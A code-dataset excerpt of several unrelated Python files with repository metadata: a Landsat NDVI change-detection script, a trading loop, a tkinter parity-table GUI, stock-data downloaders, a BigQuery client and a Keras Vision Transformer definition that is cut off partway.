fiona.open(r\"D:\\BDA\\data\\Bulk Order 960972\\wake_county_mask__.shp\", \"r\") as shapefile:\n geoms = [feature[\"geometry\"] for feature in shapefile]\n out_crs = shapefile.crs\n while len(sorted) != 1:\n tifs = sorted[-2:]\n year1 = tifs[0][-8:-4]\n year2 = tifs[1][-8:-4]\n change_raster = subtract(tifs[0], tifs[1], out_crs, output_dir)\n # clip the change raster to the county line and mask out water bodies and agricultural parcels\n with rasterio.open(change_raster) as src:\n out_img, out_trans = mask(src, geoms, crop=True)\n kwargs = src.meta.copy()\n kwargs.update(\n driver='GTiff',\n height=out_img.shape[1],\n width=out_img.shape[2],\n transform=out_trans\n )\n with rasterio.open(os.path.join(output_dir, 'CHANGE_{}_{}.tif'.format(year1, year2)), 'w', **kwargs) as dst:\n dst.write(out_img)\n\n sorted.pop()\n\n\ndef subtract(time_newer, time_later, out_crs, output_dir):\n \"\"\"\n Subtract the older from the newer data and threshold values to 1 if below -0.25\n and 0 if anything else\n :param time_newer: raster representing the more recent data\n :param time_later: raster representing the older data\n :param out_crs: output coordinate reference system neeeded to set the output value\n :param output_dir: output directory\n :return:\n \"\"\"\n change_temp = os.path.join(output_dir, 'temp.tif')\n with rasterio.open(time_newer) as src:\n newer = src.read(1)\n kwargs = src.meta\n with rasterio.open(time_later) as src:\n later = src.read(1)\n kwargs.update(\n count=1,\n dtype=rasterio.uint8,\n crs=out_crs,\n nodata=0\n )\n change = (newer.astype(float) - later.astype(float))\n change[change > -0.25] = 0\n change[change <= -0.25] = 1\n change = change.astype(rasterio.uint8)\n with rasterio.open(change_temp, 'w', **kwargs) as dst:\n dst.write_band(1, change)\n return change_temp\n\n\ndef run(working_dir):\n try:\n # set up output directories\n output_ndvi, max_ndvi, change = build_folders(working_dir)\n # do work\n calc_ndvi(working_dir, output_ndvi)\n calc_max_ndvi(output_ndvi, max_ndvi)\n change_analysis(max_ndvi, change)\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n working_dir = r'D:\\BDA\\data\\Bulk Order 964143\\U.S. Landsat 4-8 ARD'\n run(working_dir)\n\n## placing the working directory of data downloaded from Earth Explorer as .tar files, the script\n## will process all data into the CHANGE folder resulting in change pixels within the county\n## excluding water bodies and agricultural lands.","repo_name":"WakeCountyGIS/NCSU_Collaboration","sub_path":"change_detection.py","file_name":"change_detection.py","file_ext":"py","file_size_in_byte":9618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7731171911","text":"from collections import defaultdict\nimport matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport random\nimport time\nfrom .dataset import RESOLUTIONS\n\n\ndef start(self, robinhood, resolution='1d', until=None):\n 'Starts live trading\\n\\n Args:\\n robinhood: (Robinhood*) a robinhood client, that already has logged in\\n resolution: (str) the resolution/freq to trade at\\n until: (str) a timestamp at which to stop trading, defaults to forever\\n '\n assert (resolution in RESOLUTIONS)\n assert robinhood.logged_in\n self.rbh = robinhood\n self.resolution = resolution\n self.stop_date = until\n self.setup()\n while True:\n date_start = datetime.now()\n timestamp = date_start.isoformat()\n if (self.stop_date and (timestamp > self.stop_date)):\n break\n self._step(timestamp)\n date_end = (date_start + timedelta(seconds=RESOLUTIONS[self.resolution]))\n wait_time = (date_end - datetime.now()).total_seconds()\n if (wait_time <= 0):\n print(\"Your algo's loop took longer than a timestep!\")\n else:\n time.sleep(wait_time)\n self.clean_up()\n","repo_name":"menna161/API-Wizard","sub_path":"PyAroma/datasets/datetime/snippets/snippet913732.py","file_name":"snippet913732.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4340639415","text":"import tkinter as tk\nfrom tkinter import END, messagebox\n\n\ndef getDatosError(inputNumber,entry:tk.Entry): \n datoError = entry.get()\n cambios = 0\n for i in range(len(inputNumber)):\n if inputNumber[i] != datoError[i]:\n cambios += 1\n if cambios > 1: \n messagebox.showwarning(title=\"Error de ingreso\", message=\"Solo puede realizarse cambios en un bit\")\n datoError = inputNumber\n print(datoError)\n #Insertar aqui funcion para arreglar paridad\n\ndef table(input_number, tipo =\"paridad\", bit_change_num = 0):\n \n p1_indices = [0,2,4,6,8,10,12,14]\n p2_indices = [1,2,5,6,9,10,13,14]\n p4_indices = [3,4,5,6,11,12,13,14]\n p8_indices = [7,8,9,10,11,12,13,14]\n\n # Crear la ventana principal\n global t1\n t1 = ventana = tk.Tk()\n \n ventana.title(\"Tabla de Paridad\")\n # Crear la tabla\n tabla = tk.Frame(ventana)\n tabla.pack()\n\n # Crear los encabezados de columna\n encabezados_error = [\"Prueba\", \"Bit\"]\n encabezados = [\"\", \"p1\", \"p2\", \"d1\", \"p3\", \"d2\", \"d3\", \"d4\", \"p4\", \"d5\", \"d6\", \"d7\", \"d8\", \"d9\", \"d10\", \"d11\", \"d12\"]\n datos = [\"\",\"Sin paridad\", \"p1\", \"p2\", \"p3\", \"p4\", \"Con Paridad\"]\n\n \n for i in range (7):\n \n tk.Label(tabla, text=datos[i], font=\"Helvetica 14 bold\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=0)\n\n for j in range(1, 17):\n tk.Label(tabla, text=\"\", borderwidth=1, relief=\"solid\", width=5, height=1).grid(row=i, column=j)\n\n if i == 0:\n tk.Label(tabla, text=encabezados[j], font=\"Helvetica 13 bold\", borderwidth=0, relief=\"solid\", width=5, height=1).grid(row=i, column=j)\n\n \n elif i == 1:\n if j in [1,2,4,8]:\n continue\n else:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n \n \n elif i == 2:\n par_index = -1\n if j-1 in p1_indices:\n par_index = p1_indices.index(j-1)\n \n if par_index >= 0:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n else:\n continue\n elif i == 3:\n par_index = -1\n if j-1 in p2_indices:\n par_index = p2_indices.index(j-1)\n\n if par_index >= 0:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n else:\n continue\n elif i == 4:\n par_index = -1\n if j-1 in p4_indices:\n par_index = p4_indices.index(j-1)\n\n if par_index >= 0:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n else:\n continue\n\n elif i == 5:\n par_index = -1\n if j-1 in p8_indices:\n par_index = p8_indices.index(j-1)\n \n if par_index >= 0:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n else:\n continue\n else:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n if tipo == 'error':\n for j in range(17,19):\n if i == 0:\n tk.Label(tabla, text=encabezados_error[j-17], font=\"Helvetica 13 bold\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=j)\n elif i == 1:\n continue\n else:\n idx = int(((j-16) * (2 ** (i-2)))) - 1\n if j == 17:\n if input_number[idx] == bit_change_num[idx]:\n tk.Label(tabla, text=\"Correcto\", font=\"Helvetica 13\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=j)\n else:\n tk.Label(tabla, text=\"Error\", font=\"Helvetica 13\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=j)\n tk.Label(tabla, text=bit_change_num[idx], font=\"Helvetica 13 bold\", borderwidth=1, relief=\"solid\", width=5, height=1).grid(row=i, column=idx+1)\n\n if j == 18:\n tk.Label(tabla, text=str(input_number[idx]), font=\"Helvetica 13\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=j)\n t1.mainloop()\ndef reiniciar_ventana_t1():\n t1.destroy()\n \n\n\n\n\n\n\n","repo_name":"joseaam2020/P1DisenoLogico","sub_path":"tabla.py","file_name":"tabla.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6130073150","text":"\"\"\"This module contains functions for retrieving and saving historical\nstock data from Yahoo Finance.\n\nThe module provides functions for retrieving historical stock data for\nApple Inc., the S&P 500 Index, and the NASDAQ-100 Index from Yahoo Finance.\nIt also includes a function for saving a Pandas DataFrame as a CSV file\nto a specified directory.\n\nFunctions:\n- get_apple_data: retrieves historical stock data for Apple Inc.\n- get_snp_data: retrieves historical stock data for the S&P 500 Index.\n- get_nasdaq_data: retrieves historical stock data for the NASDAQ-100 Index.\n- save_locally: saves a Pandas DataFrame locally as a CSV file.\n\"\"\"\nimport os\nimport yfinance as yf\n\n\ndef get_apple_data():\n \"\"\"\n Retrieves historical stock data for Apple Inc. from Yahoo Finance.\n\n Args:\n None\n\n Returns:\n pandas.DataFrame:\n A DataFrame containing the historical stock data for Apple Inc.\n\n \"\"\"\n # create a Ticker object for Apple Inc.\n apple = yf.Ticker(\"AAPL\")\n\n # get the historical stock data for Apple Inc.\n aapl_stock = apple.history(start=\"2017-04-01\", end=\"2022-05-31\", interval=\"1d\")\n\n # reset the index of the DataFrame\n aapl_stock.reset_index(inplace=True)\n\n # return the DataFrame containing the stock data\n return aapl_stock\n\n\ndef get_snp_data():\n \"\"\"\n Retrieves historical stock data for the S&P 500 Index from Yahoo Finance.\n\n Args:\n None\n\n Returns:\n pandas.DataFrame:\n A DataFrame containing the historical stock data for the S&P 500 Index.\n\n \"\"\"\n # create a Ticker object for the S&P 500 Index\n snp = yf.Ticker(\"SPY\")\n\n # get the historical stock data for the S&P 500 Index\n snp_stock = snp.history(start=\"2017-04-01\", end=\"2022-05-31\", interval=\"1d\")\n\n # reset the index of the DataFrame\n snp_stock.reset_index(inplace=True)\n\n # return the DataFrame containing the stock data\n return snp_stock\n\n\ndef get_nasdaq_data():\n \"\"\"\n Retrieves historical stock data for the NASDAQ-100 Index from Yahoo Finance.\n\n Args:\n None\n\n Returns:\n pandas.DataFrame:\n A DataFrame containing the historical stock data for the NASDAQ-100 Index.\n\n \"\"\"\n # create a Ticker object for the NASDAQ-100 Index\n nasdaq = yf.Ticker(\"QQQ\")\n\n # get the historical stock data for the NASDAQ-100 Index\n nasdaq_stock = nasdaq.history(start=\"2017-04-01\", end=\"2022-05-31\", interval=\"1d\")\n\n # reset the index of the DataFrame\n nasdaq_stock.reset_index(inplace=True)\n\n # return the DataFrame containing the stock data\n return nasdaq_stock\n\n\ndef save_locally(data, directory):\n \"\"\"\n Saves a Pandas DataFrame locally as a CSV file.\n\n Args:\n data: A Pandas DataFrame to be saved.\n dir: The directory where the CSV file should be saved.\n\n Returns:\n None\n\n Example Usage:\n stock_data = pd.read_csv('stock_data.csv')\n save_locally(stock_data, 'C:/Users/MyUser/Documents/stock_data.csv')\n \"\"\"\n if not os.path.exists(directory):\n data.to_csv(directory)\n print(\"Data saved locally to: \" + directory)\n else:\n print(\"Data already exists locally at: \" + directory)\n","repo_name":"moshesimon/DAPS_Assignment_2023","sub_path":"Aquisition/stock_data.py","file_name":"stock_data.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7162317751","text":"from google.cloud import bigquery\nimport json\n\nclass BigQueryClient:\n \"\"\" Extracts data from Google BigQuery\n This class will not function without the json key. \n \"\"\"\n\n query = 'SELECT * FROM `fh-bigquery.reddit_comments.2015_01` '\n\n def __init__(self, key_path = None):\n if key_path is None:\n key_path = 'key.json'\n self.bigquery_client = bigquery.Client.from_service_account_json(key_path)\n\n def run_query(self, query, limit = None):\n \"\"\"\n Performs a BigQuery query.\n \"\"\"\n if limit is not None:\n query += 'LIMIT ' + str(limit)\n query_job = self.bigquery_client.query(query) # API request\n return query_job.result() # Waits for query to finish\n\n def produce_json_data(self, producer, limit = None):\n \"\"\"\n Runs a query and converts the result into a json object.\n \"\"\"\n raw_data = self.run_query(BigQueryClient.query, limit)\n for row in raw_data:\n json_data = self.__data_row_to_json(row)\n producer.send_data(json_data)\n\n\n def __data_row_to_json(self, row):\n \"\"\"\n Converts data inside a row iterator to a json object.\n \"\"\"\n raw_data = {}\n raw_data[\"body\"] = row.body\n raw_data[\"score_hidden\"] = row.score_hidden\n raw_data[\"archived\"] = row.archived\n raw_data[\"name\"] = row.name\n raw_data[\"author\"] = row.author\n raw_data[\"author_flair_text\"] = row.author_flair_text\n raw_data[\"downs\"] = row.downs\n raw_data[\"created_utc\"] = row.created_utc\n raw_data[\"subreddit_id\"] = row.subreddit_id\n raw_data[\"link_id\"] = row.link_id\n raw_data[\"parent_id\"] = row.parent_id\n raw_data[\"score\"] = row.score\n raw_data[\"retrieved_on\"] = row.retrieved_on\n raw_data[\"controversiality\"] = row.controversiality\n raw_data[\"gilded\"] = row.gilded\n raw_data[\"id\"] = row.id\n raw_data[\"subreddit\"] = row.subreddit\n raw_data[\"ups\"] = row.ups\n raw_data[\"distinguished\"] = row.distinguished\n raw_data[\"author_flair_css_class\"] = row.author_flair_css_class\n\n return json.dumps(raw_data)\n","repo_name":"anduinsay/StickComments","sub_path":"extraction/big_query_client.py","file_name":"big_query_client.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5865288449","text":" # noqa: E501\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nfrom keras_cv.layers import TransformerEncoder\nfrom keras_cv.layers.vit_layers import PatchingAndEmbedding\nfrom keras_cv.models.legacy import utils\nfrom keras_cv.models.legacy.weights import parse_weights\n\nMODEL_CONFIGS = {\n \"ViTTiny16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 12,\n \"project_dim\": 192,\n \"mlp_dim\": 768,\n \"num_heads\": 3,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTS16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 12,\n \"project_dim\": 384,\n \"mlp_dim\": 1536,\n \"num_heads\": 6,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTB16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 12,\n \"project_dim\": 768,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTL16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 24,\n \"project_dim\": 1024,\n \"mlp_dim\": 4096,\n \"num_heads\": 16,\n \"mlp_dropout\": 0.1,\n \"attention_dropout\": 0.0,\n },\n \"ViTH16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 32,\n \"project_dim\": 1280,\n \"mlp_dim\": 5120,\n \"num_heads\": 16,\n \"mlp_dropout\": 0.1,\n \"attention_dropout\": 0.0,\n },\n \"ViTTiny32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 12,\n \"project_dim\": 192,\n \"mlp_dim\": 768,\n \"num_heads\": 3,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTS32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 12,\n \"project_dim\": 384,\n \"mlp_dim\": 1536,\n \"num_heads\": 6,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTB32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 12,\n \"project_dim\": 768,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTL32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 24,\n \"project_dim\": 1024,\n \"mlp_dim\": 4096,\n \"num_heads\": 16,\n \"mlp_dropout\": 0.1,\n \"attention_dropout\": 0.0,\n },\n \"ViTH32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 32,\n \"project_dim\": 1280,\n \"mlp_dim\": 5120,\n \"num_heads\": 16,\n \"mlp_dropout\": 0.1,\n \"attention_dropout\": 0.0,\n },\n}\n\nBASE_DOCSTRING = \"\"\"Instantiates the {name} architecture.\n Reference:\n - [An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale](https://arxiv.org/abs/2010.11929v2)\n (ICLR 2021)\n This function returns a Keras {name} model.\n\n The naming convention of ViT models follows: ViTSize_Patch-size\n (i.e. ViTS16).\n The following sizes were released in the original paper:\n - S (Small)\n - B (Base)\n - L (Large)\n But subsequent work from the same authors introduced:\n - Ti (Tiny)\n - H (Huge)\n\n The parameter configurations for all of these sizes, at patch sizes 16 and\n 32 are made available, following the naming convention laid out above.\n\n For transfer learning use cases, make sure to read the\n [guide to transfer learning & fine-tuning](https://keras.io/guides/transfer_learning/).\n Args:\n include_rescaling: bool, whether to rescale the inputs. If set to\n True, inputs will be passed through a `Rescaling(scale=1./255.0)`\n layer. Note that ViTs expect an input range of `[0..1]` if rescaling\n isn't used. Regardless of whether you supply `[0..1]` or the input\n is rescaled to `[0..1]`, the inputs will further be rescaled to\n `[-1..1]`.\n include_top: bool, whether to include the fully-connected layer at the\n top of the network. If provided, num_classes must be provided.\n num_classes: optional int, number of classes to classify images into,\n only to be specified if `include_top` is True.\n weights: one of `None` (random initialization), a pretrained weight file\n path, or a reference to pre-trained weights\n (e.g. 'imagenet/classification') (see available pre-trained weights\n in weights.py). Note that the 'imagenet' weights only work on an\n input shape of (224, 224, 3) due to the input shape dependent\n patching and flattening logic.\n input_shape: optional shape tuple, defaults to (None, None, 3).\n input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)\n to use as image input for the model.\n pooling: optional pooling mode for feature extraction\n when `include_top` is `False`.\n - `None` means that the output of the model will be the 4D tensor\n output of the last convolutional block.\n - `avg` means that global average pooling will be applied to the\n output of the last convolutional block, and thus the output of\n the model will be a 2D tensor.\n - `max` means that global max pooling will be applied.\n - `token_pooling`, default, means that the token at the start of the\n sequences is used instead of regular pooling.\n name: (Optional) name to pass to the model, defaults to \"{name}\".\n classifier_activation: A `str` or callable. The activation function to\n use on the \"top\" layer. Ignored unless `include_top=True`. Set\n `classifier_activation=None` to return the logits of the \"top\"\n layer.\n Returns:\n A `keras.Model` instance.\n\"\"\" # noqa: E501\n\n\n@keras.utils.register_keras_serializable(package=\"keras_cv.models\")\nclass ViT(keras.Model):\n \"\"\"Instantiates the ViT architecture.\n\n Args:\n mlp_dim: the dimensionality of the hidden Dense layer in the transformer\n MLP head\n include_rescaling: bool, whether to rescale the inputs. If set to\n True, inputs will be passed through a `Rescaling(1/255.0)` layer.\n name: string, model name.\n include_top: bool, whether to include the fully-connected\n layer at the top of the network.\n weights: one of `None` (random initialization),\n or the path to the weights file to be loaded.\n input_shape: optional shape tuple, defaults to (None, None, 3).\n input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)\n to use as image input for the model.\n pooling: optional pooling mode for feature extraction\n when `include_top` is `False`.\n - `None` means that the output of the model will be\n the 4D tensor output of the\n last convolutional layer.\n - `avg` means that global average pooling\n will be applied to the output of the\n last convolutional layer, and thus\n the output of the model will be a 2D tensor.\n - `max` means that global max pooling will\n be applied.\n - `token_pooling`, default, means that the token at the start of the\n sequences is used instead of regular pooling.\n num_classes: optional number of classes to classify images\n into, only to be specified if `include_top` is True.\n mlp_dim:\n project_dim: the latent dimensionality to be projected into in the\n output of each stacked transformer encoder\n activation: the activation function to use in the first `layers.Dense`\n layer in the MLP head of the transformer encoder\n attention_dropout: the dropout rate to apply to the `MultiHeadAttention`\n in each transformer encoder\n mlp_dropout: the dropout rate to apply between `layers.Dense` layers\n in the MLP head of the transformer encoder\n num_heads: the number of heads to use in the `MultiHeadAttention` layer\n of each transformer encoder\n transformer_layer_num: the number of transformer encoder layers to stack\n in the Vision Transformer\n patch_size: the patch size to be supplied to the Patching layer to turn\n input images into a flattened sequence of patches\n classifier_activation: A `str` or callable. The activation function to\n use on the \"top\" layer. Ignored unless `include_top=True`. Set\n `classifier_activation=None` to return the logits of the \"top\"\n layer.\n **kwargs: Pass-through keyword arguments to `keras.Model`.\n \"\"\"\n\n def __init__(\n self,\n include_rescaling,\n include_top,\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n patch_size=None,\n transformer_layer_num=None,\n num_heads=None,\n mlp_dropout=None,\n attention_dropout=None,\n activation=None,\n project_dim=None,\n mlp_dim=None,\n classifier_activation=\"softmax\",\n **kwargs,\n ):\n if weights and not tf.io.gfile.exists(weights):\n raise ValueError(\n \"The `weights` argument should be either `None` or the path \"\n \"to the weights file to be loaded. Weights file not found at \"\n \"location: {weights}\"\n )\n\n if include_top and not num_classes:\n raise ValueError(\n \"If `include_top` is True, you should specify `num_classes`. \"\n f\"Received: num_classes={num_classes}\"\n )\n\n if include_top and pooling:\n raise ValueError(\n f\"`pooling` must be `None` when `include_top=True`.\"\n f\"Received pooling={pooling} and include_top={include_top}. \"\n )\n\n inputs = utils.parse_model_inputs(input_shape, input_tensor)\n x = inputs\n\n if include_rescaling:\n x = layers.Rescaling(1.0 / 255.0, name=\"rescaling\")(x)\n\n # The previous layer rescales [0..255] to [0..1] if applicable\n # This one rescales [0..1] to [-1..1] since ViTs expect [-1..1]\n x = layers.Rescaling(scale=1.0 / 0.5, offset=-1.0, name=\"rescaling_2\")(\n x\n )\n\n encoded_patches = PatchingAndEmbedding(project_dim, patch_size)(x)\n encoded_patches = layers.Dropout(mlp_dropout)(encoded_patches)\n\n for _ in range(transformer_layer_num):\n encoded_patches = TransformerEncoder(\n project_dim=project_dim,\n mlp_dim=mlp_dim,\n num_heads=num_heads,\n mlp_dropout=mlp_dropout,\n attention_dropout=attention_dropout,\n activation=activation,\n )(encoded_patches)\n\n output = layers.LayerNormalization(epsilon=1e-6)(encoded_patches)\n\n if include_top:\n output = output[:, 0]\n output = layers.Dense(\n num_classes, activation=classifier_activation\n )(output)\n\n elif pooling == \"token_pooling\":\n output = output[:, 0]\n elif pooling == \"avg\":\n output = layers.GlobalAveragePooling1D()(output)\n\n # Create model.\n super().__init__(inputs=inputs, outputs=output, **kwargs)\n\n if weights is not None:\n self.load_weights(weights)\n\n self.include_rescaling = include_rescaling\n self.include_top = include_top\n self.input_tensor = input_tensor\n self.pooling = pooling\n self.num_classes = num_classes\n self.patch_size = patch_size\n self.transformer_layer_num = transformer_layer_num\n self.num_heads = num_heads\n self.mlp_dropout = mlp_dropout\n self.attention_dropout = attention_dropout\n self.activation = activation\n self.project_dim = project_dim\n self.mlp_dim = mlp_dim\n self.classifier_activation = classifier_activation\n\n def get_config(self):\n return {\n \"include_rescaling\": self.include_rescaling,\n \"include_top\": self.include_top,\n \"name\": self.name,\n \"input_shape\": self.input_shape[1:],\n \"input_tensor\": self.input_tensor,\n \"pooling\": self.pooling,\n \"num_classes\": self.num_classes,\n \"patch_size\": self.patch_size,\n \"transformer_layer_num\": self.transformer_layer_num,\n \"num_heads\": self.num_heads,\n \"mlp_dropout\": self.mlp_dropout,\n \"attention_dropout\": self.attention_dropout,\n \"activation\": self.activation,\n \"project_dim\": self.project_dim,\n \"mlp_dim\": self.mlp_dim,\n \"classifier_activation\": self.classifier_activation,\n \"trainable\": self.trainable,\n }\n\n @classmethod\n def from_config(cls, config):\n return cls(**config)\n\n\ndef ViTTiny16(\n *,\n include_rescaling,\n include_top,\n name=\"ViTTiny16\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTTiny16 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, \"vittiny16\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTTiny16\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTTiny16\"][\n \"transformer_layer_num\"\n ],\n project_dim=MODEL_CONFIGS[\"ViTTiny16\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTTiny16\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTTiny16\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTTiny16\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTTiny16\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTS16(\n *,\n include_rescaling,\n include_top,\n name=\"ViTS16\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTS16 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, \"vits16\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTS16\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTB32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTS16\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTS16\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTS16\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTS16\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTS16\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTB16(\n *,\n include_rescaling,\n include_top,\n name=\"ViTB16\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTB16 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, \"vitb16\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTB16\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTB16\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTB16\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTB16\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTB16\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTB16\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTB16\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTL16(\n *,\n include_rescaling,\n include_top,\n name=\"ViTL16\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTL16 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, \"vitl16\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTL16\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTL16\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTL16\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTL16\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTL16\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTL16\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTL16\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTH16(\n *,\n include_rescaling,\n include_top,\n name=\"ViTH16\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTH16 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=weights,\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTH16\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTH16\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTH16\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTH16\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTH16\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTH16\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTH16\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTTiny32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTTiny32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTTiny32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=weights,\n 